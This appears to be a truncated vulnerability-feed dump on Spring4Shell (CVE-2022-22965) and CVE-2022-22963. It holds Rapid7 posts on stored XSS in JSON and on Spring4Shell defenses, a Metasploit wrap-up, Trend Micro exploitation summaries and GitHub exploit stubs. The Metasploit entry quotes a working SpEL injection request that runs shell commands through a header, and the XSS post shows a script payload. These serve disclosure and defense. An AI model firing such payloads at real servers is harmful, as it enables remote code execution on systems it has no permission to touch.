cleverly crafted links \u2013 stored XSS affects any and everyone visiting the compromised site. This is because the XSS has been stored in the applications database, allowing for a much larger attack surface.\n\n## Old-school apps\n\nNow that we\u2019ve established a basic understanding of stored XSS, let's go back in time a few decades to when web apps were much simpler in their communications between the front-end and back-end counterparts.\n\nLet's say you want to change some personal information on a website, like your email address on a contacts page. When you enter in your email address and click the update button, it triggers the POST method to send the form data to the back end to update that value in a database. The database updates the value in a table, then pushes a response back to the web applications front end, or UI, for you to see. This would usually result in the entire page having to reload to display only a very minimal amount of change in content, and while it\u2019s very inefficient, nonetheless the information would be added and updated for the end user to consume.\n\nIn the example below, clicking the update button submits a POST form request to the back-end database where the application updates and stores all the values, then provides a response back to the webpage with the updated info.\n\n\n\n\n\n## Old-school XSS\n\nAs mentioned in my previous blog post on injection, I give an example where an attacker enters in a payload of &lt;script&gt;alert(\u201cThis is XSS\u201d)&lt;/script&gt; instead of their email address and clicks the update button. Again, this triggers the POST method to take our payload and send it to the back-end database to update the email table, then pushes a response back to the front end, which gets rendered back to the UI in HTML. However, this time the email value being stored and displayed is my XSS payload, &lt;script&gt;alert(\u201cThis is XSS\u201d)&lt;/script&gt;, not an actual email address.\n\n\n\nAs seen above, clicking the \u201cupdate\u201d button submits the POST form data to the back end where the database stores the values, then pushes back a response to update the UI as HTML.\n\n\n\nHowever, because our payload is not being sanitized properly, our malicious JavaScript gets executed by the browser, which causes our alert box to pop up as seen below.\n\n\n\nWhile the payload used in the above example is harmless, the point to drive home here is that we were able to get the web application to store and execute our JavaScript all through a simple contact form. Anyone visiting my contact page will see this alert pop up because my XSS payload has been stored in the database and gets executed every time the page loads. From this point on, the possible damage that could be done here is endless and only limited by the attacker\u2019s imagination\u2026 well, and their coding skills. \n\n## New-school apps\n\nIn the first example I gave, when you updated the email address on the contact page and the request was fulfilled by the backend, the entire page would reload in order to display the newly created or updated information. You can see how inefficient this is, especially if the only thing changing on the page is a single line or a few lines of text. Here is where ajax and/or the fetch method comes in.\n\n[Ajax, or the fetch method](<https://www.w3schools.com/whatis/whatis_ajax.asp>), can be used to get data from or post data to a remote source, then update the front-end UI of that web application without having to refresh the page. Only the content from the specific request is updated, not the entire page, and that is the key difference between our first example and this one.\n\nAnd a very popular format for said data being sent and received is JavaScript Object Notation, most commonly known as JSON. (Don't worry, I\u2019ll get back to those curly braces in just a bit.) \n\n## New-school XSS\n\n_(Well, not really, but it sounds cool.)_\n\nNow, let's pretend we\u2019ve traveled back to the future and our contact page has been rewritten to use ajax or the fetch method to send and receive data to and from the database. From the user's point of view, nothing has changed \u2014 still the same ol\u2019 form. But this time, when the email address is being updated, only the contact form refreshes. The entire page and all of its contents do not refresh like in the previous version, which is a major win for efficiency and user experience. \n\nBelow is an example of what a POST might look like formatted in JSON.\n\n\n\n\u201cWhat is JSON?\u201d you might ask. Short for JavaScript Object Notation, it is a lightweight text format for storing and transferring data and is most commonly used when sending data to and from servers. Remember those curly braces I mentioned earlier? Well, one quick and easy way to spot JSON is the formatting and the use of curly braces.\n\nIn the example above, you can see what our new POST looks like using ajax or the fetch method in JavaScript. While the end result is no different than before, as seen in the example below, the method that was used to update the page is quite different. The key difference here is that the data we\u2019re wanting to update is being treated as just that: data, but in the form of JSON as opposed to HTML.\n\n\n\nNow, let's inject the same XSS payload into the same email field and hit update. In the example below, you can see that our POST request has been wrapped in curly braces, using JSON, and is formatted a bit differently than previously before being sent to the back end to be processed.\n\n\n\n\n\nIn the example above, you can see that the application is allowing my email address to be the XSS payload in its entirety. However, the JavaScript here is only being displayed and not being executed as code by the browser, so the alert \u201cpop\u201d message never gets triggered as in the previous example. That again is the key difference from the original way we were fulfilling the requests versus our new, more modern way \u2014 or in short, using JSON instead of HTML.\n\nNow you might be asking yourself, what's wrong with allowing the XSS payload to be the email address if it's only being displayed and not being executed as JavaScript by the browser. That is a valid question, but hear me out.\n\nSee, I've been working in this industry long enough to know that the two most common responses to a question or statement regarding cybersecurity begin with either \u201cthat depends\u2026\u201d or \u201cwhat if\u2026\u201d I'm going to go with the latter here and throw a couple what-ifs at you.\n\nNow that my XSS is stored in your database, it\u2019s only a matter of time before this ticking time bomb goes off. Just because my XSS is being treated as JSON and not HTML now does not mean that will always be the case, and attackers are betting on this.\n\nHere are a few scenarios.\n\n### Scenario 1\n\nWhat if team B handles this data differently from team A? What if team B still uses more traditional methods of sending and receiving data to and from the back end and does leverage the use of HTML and not JSON? \n\nIn that case, the XSS would most likely eventually get executed. It might not affect the website that the XSS was originally injected into, but the stored data can be (and usually is) also used elsewhere. The XSS stored in that database is probably going to be shared and used by multiple other teams and applications at some point. The odds of all those different teams leveraging the exact same standards and best practices are slim to none, and attackers know this. \n\n### Scenario 2\n\nWhat if, down the road, a developer using more modern techniques like ajax or the fetch method to send and receive data to and from the back end decides to use the .innerHTML property instead of .innerTEXT to load that JSON into the UI? All bets are off, and the stored XSS that was previously being protected by those lovely curly braces will now most likely get executed by the browser.\n\n### Scenario 3\n\nLastly, what if the current app had been developed to use server-side rendering, but a decision from higher up has been made that some costs need to be cut and that the company could actually save money by recoding some of their web apps to be client-side rather than server-side? \n\nPreviously, the back end was doing all the work, including sanitizing all user input, but now the shift will be for the browser to do all the heavy lifting. Good luck spotting all the XSS stored in the DB \u2014 in its previous state, it was \u201charmless,\u201d but now it could get rendered to the UI as HTML, allowing the browser to execute said stored XSS. In this scenario, a decision that was made upstream will have an unexpected security impact downstream, both figuratively and literally \u2014 a situation that is all too well-known these days.\n\n## Final thoughts\n\nPart of my job as a security advisor is to, well, advise. And it's these types of situations that keep me up at night. I come across XSS in applications every day, and while I may not see as many fun and exciting \u201cpops\u201d as in years past, I see something a bit more troubling. \n\nThis type of XSS is what I like to call a \u201csleeper vuln\u201d \u2013 laying dormant, waiting for the right opportunity to be woken up. If I didn't know any better, I'd say XSS has evolved and is aware of its new surroundings. Of course, XSS hasn\u2019t evolved, but the applications in which it lives have. \n\nAt the end of the day, we\u2019re still talking about the same XSS from its conception, the same XSS that has been on the [OWASP Top 10](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) for decades \u2014 what we\u2019re really concerned about is the lack of sanitization or handling of user input. But now, with the massive adoption of JavaScript frameworks like Angular, libraries like React, the use of APIs, and the heavy reliance on them to handle the data properly, we\u2019ve become complacent in our duties to harden applications the proper way.\n\nThere seems to be a division in camps around XSS in JSON. On the one hand, some feel that since the JavaScript isn't being executed by the browser, everything is fine. Who cares if an email address (or any data for that matter) is potentially dangerous \u2014 _**as long as**_ it's not being executed by the browser. And on the other hand, you have the more fundamentalist, dare I say philosophical thought that all user input should never be trusted: It should always be sanitized, regardless of whether it\u2019s treated as data or not \u2014 and not solely because of following best coding and security practices, but also because of the \u201cthat depends\u201d and \u201cwhat if\u201d scenarios in the world. \n\nI'd like to point out in my previous statement above, that \u201c_**as long as**_\u201d is vastly different from _**\u201c**cannot._\u201d \u201cAs long as\u201d implies situational awareness and that a certain set of criteria need to be met for it to be true or false, while \u201ccannot\u201d is definite and fixed, regardless of the situation or criteria. \u201cAs long as the XSS is wrapped in curly braces\u201d means it does not pose a risk in its current state but could in other states. But if input is sanitized and escaped properly, the XSS would never exist in the first place, and thus it \u201ccannot\u201d or could not be executed by the browser, ever.\n\nI guess I cannot really complain too much about these differences of opinions though. The fact that I'm even having these conversations with others is already a step in the right direction. But what does concern me is that it's 2022, and we\u2019re still seeing XSS rampant in applications, but because it's wrapped in JSON somehow makes it acceptable. One of the core fundamentals of my job is to find and prioritize risk, then report. And while there is always room for discussion around the severity of these types of situations, lots of factors have to be taken into consideration, a spade isn't always a spade in [application security](<https://www.rapid7.com/fundamentals/web-application-security/>), or cybersecurity in general for that matter. But you can rest assured if I find XSS in JSON in your environment, I will be calling it out. \n\nI hope there will be a future where I can look back and say, \u201cRemember that one time when curly braces were all that prevented your website from getting hacked?\u201d Until then, JSON or not, never trust user data, and sanitize all user input (and output for that matter). A mere { } should never be the difference between your site getting hacked or not.\n\n_**Additional reading:**_\n\n * _[Cloud-Native Application Protection (CNAPP): What's Behind the Hype?](<https://www.rapid7.com/blog/post/2022/05/02/cloud-native-application-protection-cnapp-whats-behind-the-hype/>)_\n * _[Rapid7 Named a Visionary in 2022 Magic Quadrant\u2122 for Application Security Testing Second Year in a Row](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>)_\n * _[Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1](<https://www.rapid7.com/blog/post/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/>)_\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T15:48:03", "type": "rapid7blog", "title": "XSS in JSON: Old-School Attacks for Modern Applications", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-04T15:48:03", "id": "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "href": "https://blog.rapid7.com/2022/05/04/xss-in-json-old-school-attacks-for-modern-applications/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\nThe warm weather is starting to roll in, the birds are chirping, and Spring... well, [Spring4Shell](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) is making a timely entrance. If you\u2019re still recovering from [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), we\u2019re here to tell you you're not alone. While discovery and research of [CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) is evolving, [Rapid7 is committed](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>) to providing our customers updates and guidance. In this blog, we wanted to share some recent product enhancements across our [application security](<https://www.rapid7.com/fundamentals/web-application-security/>) portfolio to help our customers with easy ways to test and secure their apps against Spring4Shell.\n\n## What is Spring4Shell?\n\nBefore we jump into how we can help you with our products, let's give a quick overview of Spring4Shell. CVE-2022-22965 affects Spring MVC and Spring WebFlux applications running JDK versions 9 and later. A new feature was introduced in JDK version 9 that allows access to the ClassLoader from a Class. This vulnerability can be exploited for remote code execution (RCE). If you\u2019re looking for more detailed information on Spring4Shell, check out our overview blog [here](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## _Updated: _RCE Attack Module for Spring4Shell\n\nCustomers leveraging [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>), our dynamic application security testing (DAST) tool, can regularly assess the risk of their applications. InsightAppSec allows you to configure 100+ types of web attacks to simulate real-world exploitation attempts. While it may be April 1st, we\u2019re not foolin\u2019 around when it comes to our excitement in sharing [this update](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) to our RCE Attack Module that we\u2019ve included in the default All Modules Attack Template \u2013 specifically testing for Spring4Shell. \n\nCloud customers who already have the [All Modules Attack Template](<https://docs.rapid7.com/insightappsec/attack-templates>) enabled will automatically benefit from this new RCE attack as part of their regular scan cadence. As of April 4th, customers with [on-prem scan engines](<https://docs.rapid7.com/release-notes/appspider/20220404/>) can also benefit from this updated RCE attack module. For those customers with on-premises engines, make sure to have auto-upgrades turned on to automatically benefit from this updated Attack Module, or update manually to the latest scan engine. \n\n\n\n\n## _NEW:_ Block against Spring4Shell attacks\n\nIn addition to assessing your applications for attacks with InsightAppSec, we\u2019ve also got you covered when it comes to protecting your in-production applications. With [tCell](<https://www.rapid7.com/products/tcell/>), customers can both detect and block anomalous activity, such as Spring4Shell exploit attempts. Check out the GIF below on how to enable the recently added Spring RCE block rule in tCell.\n\n\n\n## _NEW:_ Identify vulnerable packages (such as CVE-2022-22965)\n\nA key component of Spring4Shell is detecting whether or not you have any vulnerable packages. tCell customers leveraging the [Java agent](<https://docs.rapid7.com/tcell/installing-the-java-agent-for-tomcat>) can determine if they have any vulnerable packages, including CVE-2022-22965, in their runtime environment.\n\nSimply navigate to tCell on the Insight Platform, select your application, and navigate to the [**Packages and Vulns**](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) tab. Here you can view any vulnerable packages that were detected at runtime, and follow the specified remediation guidance.\n\n\n\nCurrently, the recommended mitigation guidance is for Spring Framework users to update to the fixed versions. Further information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>).\n\n## Utilize OS commands\n\nOne of the benefits of using tCell\u2019s [app server agents](<https://docs.rapid7.com/tcell/install-an-agent>) is the fact that you can enable blocking (after confirming you\u2019re not blocking any legitimate commands) for OS commands. This will prevent a wide range of exploits including Shell commands. Below you will see an example of our [**OS Commands**](<https://docs.rapid7.com/tcell/command-injection>) dashboard highlighting the execution attempts, and in the second graphic, you\u2019ll see the successfully blocked OS command events.\n\n\n\n \n\n\n\n\n## What\u2019s next?\n\nWe recommend following [Spring\u2019s latest guidance](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) on remediation to reduce risk in your applications. If you\u2019re looking for more information at any time, we will continue to update both this blog, and our [initial response blog to Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). Additionally, you can always reach out to your customer success manager, support resources, or anyone on your Rapid7 account team. Happy April \u2013 and here\u2019s to hoping the only shells you deal with in the future are those found on the beach!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T22:26:36", "type": "rapid7blog", "title": "Securing Your Applications Against Spring4Shell (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T22:26:36", "id": "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "href": "https://blog.rapid7.com/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2022-04-08T19:28:48", "description": "We discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that allows malicious actors to download the Mirai botnet malware.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T00:00:00", "type": "trendmicroblog", "title": "CVE-2022-22965: Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "href": "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:29:16", "description": "Recently, we observed the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T15:36:25", "description": "Recently, we observed attempts to exploit the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 by malicious actors to deploy cryptocurrency miners.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T00:00:00", "type": "trendmicroblog", "title": "Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-20T00:00:00", "id": "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "href": "https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-06-14T15:55:23", "description": "# spring-rec-demo\n\nThe demo code showing the recent Spring4Shell...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T04:17:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-26T19:31:44", "id": "69C8078C-1B8D-5B51-8951-4342A675A93D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-20T05:19:51", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T23:16:40", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-21T06:41:10", "id": "91C0D03D-8468-59A7-B3B7-F6B118A62FFB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:53:41", "description": "# spring-core-rce \nspring core rce \u7b80\u5355\u5229\u7528 \n\nwar\u53ef\u4ee5\u4f7f\u7528 \nhttps://gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 